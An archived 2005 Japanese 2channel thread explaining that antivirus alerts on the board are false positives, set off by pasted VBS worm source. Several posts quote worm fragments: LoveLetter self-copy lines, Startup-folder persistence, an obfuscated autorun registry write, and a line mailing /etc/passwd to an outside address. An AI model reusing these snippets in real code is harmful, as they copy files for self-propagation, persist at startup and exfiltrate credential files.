5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

ノートンがvbsウィルスのソースに誤反応3

1 :他のアンチウィルスソフトが反応する場合もあります:05/03/01 01:58:58 ID:???
只今2chでvbsのウィルスのソースを貼りノートンなどのセキュリティツールを誤反応させるのが流行っています。
あまりにも質問スレなどで既出の(このvbsの)質問が多すぎるのでこのスレへURLを貼って誘導してください。
また新たなパターンのvbsが見つかったら一応このスレで報告願えると幸いです。

■この問題について■
2chのスレにvbsウィルスのソースを書き込むことによってブラウザがそのスレのhtmlファイルをダウンロードする際に
ウィルスのパターンと一致するので、ウィルスが検出されたとノートン先生などが騒ぎます。(設定によっては反応しないこともありますが、全く問題ありません)
ご存知の通り、htmlを読んでもこのvbsのソースは実行されることは無いので、全く問題ありません。
また、デフォルトだとIEはInternet Temporary Filesフォルダにhtmlをダウンロードしますので、感染ファイルはここのhtmlファイルにになります。
これらのファイルは削除しても全く問題ありませんが、該当スレを読み直すとまたvbsのソース付きhtmlがダウンロードされてしまうので警告が出ます。

■まとめと対策■
2ちゃんねる見ていたらvbsウィルスが検出された!
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8#faq12
2ちゃんねる専用ブラウザでノートンを使うと今まで取得したログが抹消されてしまい、スレを再表示した時全てが新しいレスになってしまいます、どうすれば解決できるでしょうか?
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8#faq08
2chブラウザのログ保存フォルダを「除外」に設定。
NAV2003以降はNorton Anti Virusのオプションで手動スキャンとAuto-Protectでそれぞれ除外の指定をして下さい。

前スレ
ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/
ノートンがvbsウィルスのソースに誤反応2
http://pc5.2ch.net/test/read.cgi/pcqa/1033948204/

テンプレ>>1-10あたり

2 :ひよこ名無しさん:05/03/01 01:59:38 ID:???
■既知のvbsウィルスのソース■

・VBS.Internal
出元はhttp://tmp.2ch.net/test/read.cgi/download/1025717301/197だと思われる。
ダウソ板からいろんな板へ飛び火した模様。

・VBS.LoveLetter.A
c.Copy(dirsystem&”LOVE−LETTER−FOR−YOU.TXT.vbs
(反応しないように全角で書いてあります)出元不明。ニュー速から?

一般論として「htm」「html」拡張子などを安易に検索対象から外すことは奨励されません。これを感染ターゲットにするウィルスが数種確認されています。
http://www.symantec.com/region/jp/sarcj/data/v/vbs.internal.html


Q.ウイルスコードが貼られているのにノートン反応しない。。。

A.ウイルスコードが貼られている2ちゃんねるのスレをテストページとして使用するのは奨励されない。
なぜなら、ここで言われているノートンの反応は単なる掲示板とスキャンエンジンの「仕様の衝突」であり、
これからも同じページを見ればその都度反応するという保証がないから。
仕様というものは、ある時突然変更されたりするもの。

ネットサーフィン中のウイルス対策ソフトの常駐動作確認は、テスト用に作られたEICARテストファイルにアクセスして行うべき。

EICARテストファイル(正常に常駐していればURLにアクセスと同時に反応します)
ttp://www.eicar.org/download/eicar.com.txt

3 :ひよこ名無しさん:05/03/01 01:59:46 ID:???
        / ̄|
       |  |
       |  |                  / ̄ ̄ ̄ ̄ ̄ ̄
      ,―    \                |
     | ___)   |       ∩∩    ∠ リュンパッチ♪
     | ___)   |       | |_| |      \______
     | ___)   |\___(・∀・ )_____
     ヽ__)_/ \___     _____, )__
         〃  .       /    /     / /    〃⌒i
         |          /    ./     / /    .i::::::::::i
   ____|     /⌒\./    /     / | ____|;;;;;;;;;;;i
  [__]___|    / /-、 .\_.  /     Uし'[_]     .|
   | ||     |    / /i  i    /         | ||      |
   | ||____|____/ / .| .|\_ノ______..| ||      |
   |(_____ノ /_| |_________..| ||      |
   | LLLLLL./ __)L_| |LLLLLLLLLLLLLLLLL. | ||_____」
   | ||    (_/   / i                .| ||    | ||
   |_||        / .ノ               |_||    |_||
            (_/

4 :ひよこ名無しさん:05/03/01 02:00:21 ID:???
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")

<  => &lt;
>  => &gt;
&  => &amp;
"  => &quot;

それぞれしっかり置換されていれば反応しない、ここの掲示板の問題。
ノートンが反応するのは、ここの掲示板(2Ch)の仕様なので気にする必要なし。
ここは、時に他のウィルス対策ソフトが反応する場合もある。
反応したらソースを見てみるといい。他の掲示板と違うことに気付くはずだ。

断言できることは、他のWebページでノートンが反応した場合は要注意ということ。


尚、ここはウイルス鑑定スレではありません。
危ないと思ったURLはラウンジ板等の”勇気が無くて見られない画像解説スレ”で診てもらいましょう。
http://find.2ch.net/?STR=%CD%A6%B5%A4%A4%AC%CC%B5%A4%AF%A4%C6+%B2%F2%C0%E2%A5%B9%A5%EC&COUNT=50&TYPE=TITLE&BBS=ALL


■関連
ノートン入れたら2chに書きこめない人へ
http://ansitu.s53.xrea.com/guidance/index.php?NortonInternetSecurity
ノートンインターネットセキュリティ@2ちゃんねる検索
http://find.2ch.net/?STR=%A5%CE%A1%BC%A5%C8%A5%F3+%8E%B2%8E%DD%8E%C0%8E%B0%8E%C8%8E%AF%8E%C4%8E%BE%8E%B7%8E%AD%8E%D8%8E%C3%8E%A8+board%3A%A5%BB%A5%AD%A5%E5%A5%EA%A5%C6%A5%A3&COUNT=50&TYPE=TITLE&BBS=ALL
【ノートン入れたら2chに書きこめない】人へ@2ちゃんねる検索
http://find.2ch.net/?STR=%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2%A3%E3%A3%E8%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4+%BF%CD%A4%D8+board%3A%BD%E9%BF%B4%BC%D4%A4%CE%BC%C1%CC%E4&COUNT=50&TYPE=TITLE&BBS=ALL

5 :ひよこ名無しさん:05/03/01 02:05:28 ID:???
補足ありましたらお願いします。

6 :ひよこ名無しさん:05/03/01 02:06:29 ID:???
ニャンです

7 :ひよこ名無しさん:05/03/01 18:00:01 ID:???
Q.2ちゃんねるの板開いただけで反応します。

A.スレッドタイトルにウイルスコードが貼られていることがあり、それに反応しています。
2ちゃんねるブラウザの場合、ログ保存フォルダの他にスレタイ・既読スレ履歴等を保存しているファイルやフォルダを除外。
各2ちゃんねるブラウザによってスレタイ・既読スレ履歴等を保存しているファイルやフォルダが異なるようなので
特定のドライブ、フォルダ、ファイルをウイルススキャンの対象から除外する方法
http://service1.symantec.com/SUPPORT/INTER/navjapanesekb.nsf/7c3ff4677729271685256c470046ed2e/d9265b84ded9587488256b0400811ff7
↑を参考にお使いの2ちゃんねるブラウザのスレでお聞きください。
NAV2003以降はNorton Anti Virusのオプションで手動スキャンとAuto-Protectでそれぞれ除外の指定をして下さい。
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8#faq08

8 :ひよこ名無しさん:05/03/02 00:36:43 ID:???
その他リンク@2ちゃんねる検索

エロサイト見たら…助けて下さい!
http://find.2ch.net/?STR=%A5%A8%A5%ED%A5%B5%A5%A4%A5%C8%B8%AB%A4%BF%A4%E9+%BD%F5%A4%B1%A4%C6%B2%BC%A4%B5%A4%A4+board%3APC%BD%E9%BF%B4%BC%D4&COUNT=50&TYPE=TITLE&BBS=ALL

パソコン初心者総合質問スレッド
http://find.2ch.net/?STR=%A5%D1%A5%BD%A5%B3%A5%F3%BD%E9%BF%B4%BC%D4%C1%ED%B9%E7%BC%C1%CC%E4%A5%B9%A5%EC%A5%C3%A5%C9+board%3APC%BD%E9%BF%B4%BC%D4&COUNT=50&TYPE=TITLE&BBS=ALL

セキュリティ初心者質問スレッド
http://find.2ch.net/?STR=%A5%BB%A5%AD%A5%E5%A5%EA%A5%C6%A5%A3%BD%E9%BF%B4%BC%D4%BC%C1%CC%E4%A5%B9%A5%EC%A5%C3%A5%C9+board%3A%A5%BB%A5%AD%A5%E5%A5%EA%A5%C6%A5%A3&COUNT=50&TYPE=TITLE&BBS=ALL

9 :ひよこ名無しさん:05/03/03 00:26:00 ID:???
    ◆◇◆ 報告用テンプレ ◆◇◆  (暫定)

>>1-9を読みましたか?            『YES/NO』
■2ちゃんねるの板・スレ・レス番のアドレス  『 』
■ノートンのメッセージ(ウイルス名)        『 』
■ブラウザの種類                 『 』
■ノートンのヴァージョン             『 』
■ノートン以外のアンチウイルスソフト名    『 』
■その他.                        『 』

10 :ひよこ名無しさん:05/03/03 01:13:35 ID:???
2ちゃんねるに貼られたウイルスコードに誤反応していたことがわかったら

インターネットエクスプローラの場合
ツール→インターネットオプション→インターネット一時ファイル、ファイルの削除
これをしないでウイルススキャンしたらインターネット一時ファイル(Temporary Internet Filesフォルダ)でウイルス反応がでます。
また、該当レスを再び読み込むとウイルス反応がでます。
2ちゃんねるブラウザを使って以下の設定をして2ちゃんねるを見ましょう。

2ちゃんねるブラウザの場合
2ちゃんねる専用ブラウザでノートンを使うと今まで取得したログが抹消されてしまい、スレを再表示した時全てが新しいレスになってしまいます、どうすれば解決できるでしょうか?
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8#faq08
2chブラウザのログ保存フォルダを「除外」に設定。
NAV2003以降はNorton Anti Virusのオプションで手動スキャンとAuto-Protectでそれぞれ除外の指定をして下さい。

11 :ひよこ名無しさん:05/03/03 02:43:55 ID:7F9C8/Th
よろ
kak.hta';ken=wdt'START
ms-its:mhtml:file://c:\


12 :ひよこ名無しさん:05/03/03 18:20:43 ID:???
>>11
既出。
Wscript.KakWorm
http://pc5.2ch.net/test/read.cgi/pcqa/1033948204/946
Bloodhound.Exploit.6
http://pc5.2ch.net/test/read.cgi/pcqa/1033948204/932

13 :ひよこ名無しさん:05/03/04 01:48:43 ID:hGA62fOr
http://c-au.2ch.net/test/-/pcqa/1033948204/928
このウイルスを解説してください

14 :ひよこ名無しさん:05/03/04 22:18:30 ID:???
DAT落ち阻止て神戸♪


>>13
VBS.LoveLetter.Var
http://pc5.2ch.net/test/read.cgi/pcqa/1033948204/928

ウイルスコードが貼られているのにノートン反応しないって人は>>2見てね。

15 :ひよこ名無しさん:05/03/05 00:21:55 ID:hfT/sPqY
ありがとう
しかしラブレター1個だけではないはず。
カーネルやネットワークも入っている。
一つ一つ解説してください。

16 :ひよこ名無しさん:05/03/05 19:06:57 ID:5lPM1YuQ
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"


↑こういうのって最初に気づいた奴って天才だよな

17 :cen ◆Pm9xOTJuM. :05/03/05 20:09:53 ID:??? ?#
あ。そうそう。
>>16 みたいなスクリプトを誤反応しないような、datファイルに
datを作り変えるプログラム作ってみました。
よかったら使ってみてください。
http://www.geocities.jp/cen_hp/index.html

18 :ひよこ名無しさん:05/03/05 22:58:07 ID:???
あやすい・・・・・

19 :cen ◆Pm9xOTJuM. :05/03/06 02:36:23 ID:??? ?#
>>18
自分のパソコンで何度も実行してますが、大丈夫ですよー。
さっき総質で見た、未対応のスクリプトに対応させました。

20 :名無しさん@お腹いぱーい。:05/03/06 22:24:25 ID:??? ?##
>>17,19
ご支援ありがとうございます。
ttp://ansitu.xrea.jp/guidance/?NortonInternetSecurity#faq08tool

21 :ひよこ名無しさん:05/03/06 22:26:34 ID:NzpAHwS7
ここの1の解説キボン
http://c-au.2ch.net/test/-/pcqa/1103598574/1

22 :ひよこ名無しさん:05/03/06 22:32:03 ID:???
==================================
=================/∧ =========/∧
===============/ / λ=======/ / λ        ー
=============/  /  λ====/  /  λ        ー /
===========/   /  /λ =/   /  /λ        /
=========/    / / //λ    / / //λ       __
=======/            ̄ ̄ ̄      \     ___
=====./        / ̄ )         ( ̄ヽ λ       /
====/        /●/          \● /λ     /
===/        //                \  /λ
===|                            / /|   ___|____
==|           ∧________   / //|    /
==|           ヽ───────〆   /////  /|\
===|                        / / ////|    |
===\                      / / /////
=====\_                   / //////__/.      |
========\                   ミ/          |
==========\                 /         ─┐
============\                \ .          ─┤
==============\                \      .   ─┘
================\                \
==================\ ・                \
=====================
======================

23 :ひよこ名無しさん:05/03/09 04:14:09 ID:???
hoshu

24 :ひよこ名無しさん:05/03/09 22:29:16 ID:???
未だにVIPの板更新すると、ノートン先生の逆鱗に触れてしまうオイラですが

2chのスレにvbsウィルスのソースを書き込むことによってブラウザがそのスレのhtmlファイルをダウンロードする際に
ウィルスのパターンと一致するので、ウィルスが検出されたとノートン先生などが騒ぎます。(設定によっては反応しないこともありますが、全く問題ありません)

らしいです、騒いでごめんなさい。
2chにかぎっては心配(゚听)イラネみたいです。

25 :24:05/03/09 22:30:49 ID:???
誤爆すいません

26 :ひよこ名無しさん:05/03/10 12:00:18 ID:???
>>24
スレタイにウィルスコードが書いてある模様。

27 :ひよこ名無しさん:05/03/11 19:52:34 ID:???
>>24
漏れもソレダ!!!
もう無視しまくりんぐwwwwwww

28 :ひよこ名無しさん:05/03/11 19:54:19 ID:2tTtEvgw
ノートンなんか使ってんなよ ハゲ

29 :ひよこ名無しさん:05/03/11 20:20:02 ID:???
A Boneを使用してるのですが、PC初心者の上の「初心者の質問」板をクリックするだけで、ノートンがウイルスを検知してしまいます。

しかも板を開く事もできません。毎回そうなってしまいます。
昨日、システムをスキャンしたら確かに感染していました。「初心者の質問」板だけ毎回そうなります。
これは何でしょうか?

30 :ひよこ名無しさん:05/03/11 21:00:24 ID:???
ぐはははははwwwVIPもそうだよ

31 :名無しさん@お腹いぱーい。:05/03/11 22:14:43 ID:??? ?##
>>29
>>7見てね。

32 :ひよこ名無しさん:05/03/12 00:37:07 ID:eI8qHG/W
2ちゃんを普通に見ていただけなのにノートンから「ウィルス名は
Unix.Penguinで、ファイルを修復できません」と表示されてしまいました。何か対策は無いでしょうか?
ちなみに誤作動との見分け方はありますか?

33 :ひよこ名無しさん:05/03/12 04:45:56 ID:???
        / ̄|
       |  |
       |  |                  / ̄ ̄ ̄ ̄ ̄ ̄
      ,―    \                |
     | ___)   |       ∩∩    ∠ リュンパッチ♪
     | ___)   |       | |_| |      \______
     | ___)   |\___(・∀・ )_____
     ヽ__)_/ \___     _____, )__
         〃  .       /    /     / /    〃⌒i
         |          /    ./     / /    .i::::::::::i
   ____|     /⌒\./    /     / | ____|;;;;;;;;;;;i
  [__]___|    / /-、 .\_.  /     Uし'[_]     .|
   | ||     |    / /i  i    /         | ||      |
   | ||____|____/ / .| .|\_ノ______..| ||      |
   |(_____ノ /_| |_________..| ||      |
   | LLLLLL./ __)L_| |LLLLLLLLLLLLLLLL. | ||_____」
   | ||    (_/   / i                .| ||    | ||
   |_||        / .ノ               |_||    |_||
            (_/

34 :ひよこ名無しさん:05/03/12 21:15:24 ID:KI7PmLwk
Open Janeをでスレを見てたらウィルスコードが張られてて
ウィルス警告が出てファイルが修復出来ませんとでました。
ウィルスコードをNGワードに入れたら、NGワードが全部消えて
デスクトップにあるNGWordtxtというアイコンを削除しようとすると
やはりウィルス警告が出て削除できません。
スキャンをするとあるファイルの所まで来ると電源が切れてしまいます。
ウィルス名は「Bloodhound.Exploit6」と出るのですが、どうしたらいいでしょうか・・・。

35 :ひよこ名無しさん:05/03/12 21:50:19 ID:???
>>34
        ∩∩
        | |_| |        / ̄ ̄ ̄ ̄ ̄ ̄ ̄
  / ̄\ ・∀・)   < リュンパッチ♪
.r ┤    ト、    \    \_______
|.  \_/  ヽ   |
|   __( ̄  | |  |
|    __)_ノ ̄ ̄ ̄ ̄\
ヽ___) ノ          \
  ||\|| ̄ ̄ ̄ ̄ ̄ ̄ ̄|| ̄
  ||  || ̄ ̄ ̄ ̄ ̄ ̄ ̄||
     .||              ||

36 :34:05/03/12 23:34:38 ID:???
すみません。
1つは解決しましたがスキャンすると電源が落ちるのは直りませんので
これは他のスレで聞いてみます

37 :ひよこ名無しさん:05/03/17 15:26:43 ID:???
なんだ、最近多いと思ってたがウィルスコードのせいだったのか。
しかしこれってあぼーんされないのかな。
とりあえずここみて安心した。ありがと。

38 :ひよこ名無しさん:2005/03/26(土) 15:19:56 ID:Yoan0Q7l
Norton Anti Virusと使ってます。
ウイルス、Unix PenguinをNGワードに登録するには
どんな単語をNGワードにすればいいんですか?

Unix Penguinと反応するスレ内見てもそれらしい書き込みがないので分かりません。

39 :ひよこ名無しさん:2005/03/26(土) 16:10:26 ID:???
>>38
NGワードに登録するんではなく
Norton Anti VirusのオプションのAuto-Protectと手動スキャンでログフォルダを除外に指定しる

40 :ひよこ名無しさん:2005/03/26(土) 16:12:46 ID:Yoan0Q7l
>>39
いや、それはやってるんですけど、反応するんです。
多分、キャッシュフォルダの方も除外指定にしないとだめっぽいです。
でも、それはセキュリティー的によくないってどっかに書いてあったんで、
NGワードに登録したいんですけど、できないんでしょうか?

41 :ひよこ名無しさん:2005/03/26(土) 16:16:33 ID:???
>>40
2ちゃんねるブラウザのログフォルダを除外にしても2ちゃんねるブラウザで閲覧中に反応するの?

42 :ひよこ名無しさん:2005/03/26(土) 16:26:59 ID:Yoan0Q7l
>>41
そうです。Norton Anti VirusとLive2chの組み合わせでAnti Virusの設定で
Live2chのログフォルダは除外に設定してます。
でも、Live2chで見てるとUnix Penguinだけ反応します。

43 :ひよこ名無しさん:2005/03/26(土) 16:29:39 ID:???
>>42
設定パス間違えてない?

44 :ひよこ名無しさん:2005/03/26(土) 16:32:08 ID:???
これはどうだ?

fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")

c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")

ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))

ms-its:mhtml:file://c:\ cat /etc/passwd | mail nobody kak.hta';ken=wd+'START

45 :ひよこ名無しさん:2005/03/26(土) 16:33:47 ID:???
と思ったら、VBS.Network.Eとかいうのも反応しっちゃってるよwww
どういうこと?

46 :ひよこ名無しさん:2005/03/26(土) 16:35:49 ID:???
それでええんや。

47 :ひよこ名無しさん:2005/03/26(土) 16:37:15 ID:???
http://pc8.2ch.net/test/read.cgi/pcqa/1109609938/43

48 :ひよこ名無しさん:2005/03/26(土) 16:37:34 ID:???
>>45
      、-'''"´ ̄ ̄`"''''-、
     / / ;;;;;;;;;;;;;  \ \⌒⌒
    / ..::;;● ;;;;;;;;;;;;;, ●;;;;;;;;;::ヽ  ^^
    |. .::;;;;;;;;;;;(__人__);;;;;;;;;;;;;;;;::.|
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
     :::::;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;::::
       :::::::;;;;;;;;;;;;;;;;;;;;;;;;;     
        ::::::::::::::::∧_∧   そうやってなんでも
        ::::::::: ( ::;;;;;;;;:)      VIPのせいにしてりゃいいさ…
          _..  /⌒:::;;;;;ヽ
-― ―'ー'-''―-''/ / ::;;;;;;;;:| |―'''ー'-''――'`'
 ,,  '''' .  ''''' と./ゝ_;_;_ノヽつ   、、, ''"        それがVIPクオリティ…
    ,,, ''  ,,,    ::;;;;;;;;;::: ,,  '''''  ,,,,        http://ex7.2ch.net/news4vip

49 :ひよこ名無しさん:2005/03/26(土) 16:38:45 ID:Yoan0Q7l
>>43
いや、間違えてないと思います。
なんか他のウイルスにも反応してる。。。Network.E。

50 :ひよこ名無しさん:2005/03/26(土) 16:40:10 ID:???
>>49
いやいや、間違えてるんだろ?

51 :ひよこ名無しさん:2005/03/26(土) 16:43:50 ID:Yoan0Q7l
>>50
いや、C\ProgramFiles\Live2ch\logになってるからあってると思います。

52 :ひよこ名無しさん:2005/03/26(土) 16:48:03 ID:???
i|!| |i┏┓! i!┏┳┓| |||i|!i| ||!i|| |||ii| ||| ||| |i||!|i│i!┏┓i!|
|i|┏┛┗━╋┻┛|i!||!|ii|| i|!i||i|┏━┓ ┏┓i|i| i┃┃i!|
i||┗┓┏┓┃||i┏━━━━┓┗━┛ ┃┃|i||!i┃┃i!|
|i |!|i┃┃┃┃i||┗━━━━┛|i|| || ||||!┃┃i|i| i┗┛!i|
i||i ||┃┃┃┃|! |||i ||i    !|||!|┏━━┛┃|i||!i┏┓i|!
|i!i |!┗┛┗┛i|!i|  / |   / | ┗━━━┛i|i| i┗┛i!|
i| |||i|!i| ||!|i||i!   /,_ ┴─/ ヽ      |!i| ||| |i||!|i|i|||| ||i
|i|| ||i!i||     (_゜.,》.'(_゜,》)ミ ヽ       ! | |!i||!|ii||!|ii|
i|ii        / ,,__,ニ、、 ノ( |           i|i!|i|
|i        | Y~~/~y} `, ~ |  そ、そんなー…   |i
!.          | ,k.,.,!,.,.,r| ,!  く                 .!
i        / <ニニニ'ノ    \               l

53 :ひよこ名無しさん:2005/03/26(土) 16:54:31 ID:???
>>51
除外に設定する時にサブフォルダも含めるにチェック入れた?

54 :ひよこ名無しさん:2005/03/26(土) 17:05:16 ID:???
チン      ☆  チン       ☆
       チン    マチクタビレタ〜   チン     ♪
           ♪
    ♪          ☆チン    .☆   ジャーン!   マチクタビレタ〜!
        ☆ チン   〃  ∧_∧  ヽ         / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
          ヽ  ___\(・∀・ #) /\_/ < うっかりさん51の報告まだ〜?
        チン    \_/⊂    つ    ‖     \__________
           / ̄ ̄ ̄ ̄ ̄ ̄ ̄/|     ‖        マチクタビレタ〜!
        |  ̄  ̄ ̄ ̄ ̄ ̄ ̄:| :|   /|\
        |             |/

55 :ひよこ名無しさん:2005/03/26(土) 17:07:33 ID:???
もう戻ってきません。

56 :ひよこ名無しさん:2005/03/26(土) 17:21:58 ID:Yoan0Q7l
>>53
チェック入ってます。

57 :ひよこ名無しさん:2005/03/26(土) 17:27:12 ID:???
i|!| |i┏┓! i!┏┳┓| |||i|!i| ||!i|| |||ii| ||| ||| |i||!|i│i!┏┓i!|
|i|┏┛┗━╋┻┛|i!||!|ii|| i|!i||i|┏━┓ ┏┓i|i| i┃┃i!|
i||┗┓┏┓┃||i┏━━━━┓┗━┛ ┃┃|i||!i┃┃i!|
|i |!|i┃┃┃┃i||┗━━━━┛|i|| || ||||!┃┃i|i| i┗┛!i|
i||i ||┃┃┃┃|! |||i ||i    !|||!|┏━━┛┃|i||!i┏┓i|!
|i!i |!┗┛┗┛i|!i|  / |   / | ┗━━━┛i|i| i┗┛i!|
i| |||i|!i| ||!|i||i!   /,_ ┴─/ ヽ      |!i| ||| |i||!|i|i|||| ||i
|i|| ||i!i||     (_゜.,》.'(_゜,》)ミ ヽ       ! | |!i||!|ii||!|ii|
i|ii        / ,,__,ニ、、 ノ( |           i|i!|i|
|i        | Y~~/~y} `, ~ |  そ、そんなー…   |i
!.          | ,k.,.,!,.,.,r| ,!  く                 .!
i        / <ニニニ'ノ    \               l

58 :ひよこ名無しさん:2005/03/26(土) 17:32:20 ID:???
>>56 もうシマンテックに聞きなさい

59 :ひよこ名無しさん:2005/03/26(土) 19:17:05 ID:Yoan0Q7l
>>58
了解w
ありがとうございました

60 :ひよこ名無しさん:2005/04/08(金) 23:17:51 ID:tNlrsDBu
画像板から誘導されてきました。
「2chブラウザのログ保存フォルダを「除外」に設定」
というのはどうやってやるんでしょうか?
壺を使ってます。

初心者すぎてすいません。どなたかよろしくお願いいたします。

61 :ひよこ名無しさん:2005/04/08(金) 23:23:05 ID:???
>>60
テンプレに書いてあるだろ

62 :ひよこ名無しさん:2005/04/09(土) 00:06:17 ID:Zkyvn8EZ
Norton Anti VirusのAuto-Protectと手動スキャンで壺フォルダを除外に指定しても、壺で閲覧中に反応します。
よくわかりません・・・orz



63 :ひよこ名無しさん:2005/04/09(土) 00:07:00 ID:tNlrsDBu

60です

64 :ひよこ名無しさん:2005/04/09(土) 19:08:32 ID:zr8Dnfd3
   ,:::-、       __
      ,,r::::::::::::〈:::::::::)    ィ::::::ヽ
      〃::::::::::::;r‐''´:::::::::::::::::::::ヽ::ノ
    ,'::;'::::::::::::::/::::::::::::::::::::::::::::::::::::
     l::::::::::::::::::l::::::::::●::::::::::::::●:::::ji
    |::::::::::::::::::、::::::::::::::( _●_)::::::,j:l  クマー!
    }::::::::::::::::::::ゝ、::::::::::|∪|_ノ::;!
.    {::::::::::::::::::::::::::::`='=::ヽノ:::::/     
    ';::::::::::::ト、::::::::::::::i^i::::::::::::/
      `ー--' ヽ:::::::::::l l;;;;::::ノ
【ラッキーレス】
このレスを見た人はコピペでもいいので
10分以内に3つのスレへ貼り付けてください。
そうすれば14日後好きな人から告白されるわ宝くじは当たるわ
出世しまくるわ体の悪い所全部治るわでえらい事です



65 :ひよこ名無しさん:2005/04/12(火) 18:29:30 ID:???
今まで書き込めなかったのはノートン先生の仕業だったのか
このスレのおかげで助かりました

66 :ひよこ名無しさん:2005/04/12(火) 22:20:35 ID:kw9rPCF2
マカフィーで反応

67 :66:2005/04/12(火) 23:08:34 ID:kw9rPCF2
駆除も削除も出来ないんだけどほっといていいのですか?

68 :ひよこ名無しさん:2005/04/18(月) 19:11:29 ID:PlotUVoz
>>66
自分もそうなるよ。

69 :ひよこ名無しさん:2005/04/18(月) 22:19:38 ID:???
すいません、ノートンAV2005なんですが、Janeのログを除外に設定したいんですが
AV2005のオプションを開いても「除外」っていう項目が無いのですけど
どうすれば設定できるのですか?
ご指導、お願い致します。

70 :ひよこ名無しさん:2005/04/19(火) 00:47:01 ID:9XxAkRTd
sagase

71 :ひよこ名無しさん:2005/04/22(金) 15:13:49 ID:ZNT0DAb6 ?
大空寺あゆ親衛隊対策

(1)タスクトレイに入っているNorton AntiVirusのアイコンを右クリック
(2)「Norton AntiVirusの設定」をクリック
(3)左側にある「Auto-Protect」をクリック
(4)その下に出てきた「除外」をクリック
(5)「除外する項目」の「新規」をクリック
(6)「C:\Program Files\Live2ch\log」(Live2chの場合)と入力し、「サブフォルダも含める」にチェックを入れ、「OK」をクリック
(7)左側にある「Auto-Protect」をクリック
(8)(4)〜(6)をもう一度繰り返す
(9)設定画面が消えるまで「OK」をクリックする

72 :ひよこ名無しさん:2005/04/22(金) 19:25:55 ID:???
              ∧        l'vヘ
         ハ ┌( ;/ ト, ,、 rヘ  r'^ナrジ-z
    __}ヽ,__ (ヽ/ス_r^フしz,り い)n/イr〜^′
   'っヾ、r'__  |レ'ノ_C'入彳勺ソメろ_j/し-,_
    `フ ヾ勹_| <_r' !|刀_」r''>||/⌒(_rヘ-‐'
     <_ゝし||フぅ(ひzメ__ゝ'l !'そ
        ~zヾ|て 、l レ^ //'| |'~
            | | ヽl| // }|
            | :! || | | ,/ ,'       すいません、ちょっと通りますよ
          | :{. || | |/ /
            l !|| | | /
          ヽ ヽ.|/ //
          _,r)_ j (_,(           ciz
         ,ノこ_- __,ーヽ         ん|Zゥ レz  zjそ_
          }    ...  丿        ろ、,_!|乙7ムLそ/し-z
         ノ""''   一(          `う.l !シ/ア了//_⊂,
        /、__      ヽ         ^'| |~//,/_ソ ハr^
        /    ......     ーl         | |// //ノ
     /~"' 、__/   ,,,...}        |/ ///
      {' _  `y′ 一  /         r'〜(_ノ
     人   =/‐-     ハ       丿"  ''(
      ヽ '' /  __,,  /       / ‐-  ''')
        '∨     X.        }'''   ....ノ 
        j    ー/        /==  ノ'ヽ 
       /=‐  r'´-ヽ        }  ー/''''  {
       ,' _,, 人 ''"`、      ノ.. '' ノ`ヽ ''"ヽ 
        {ー /  \ -'}     / /    \'''}`
      ハ  〈      )八     ( f       )ハ
       ヽ )   ((        )ノ      /
       ノ/     ')    _/

73 :ひよこ名無しさん:2005/04/24(日) 20:15:37 ID:P3pvijoD
ちゃんと2ch.netとAuto-Protectと手動スキャンで除外設定しましたが
VBS.Internalがしつこく警告ストロムしてきます
他に必要な手順はありますか?

74 :ひよこ名無しさん:2005/04/24(日) 20:59:20 ID:KLwGdhW7
>>72
ひわいな大根買い占める! ハイ!
 (( (`Д´) (`Д´) ))
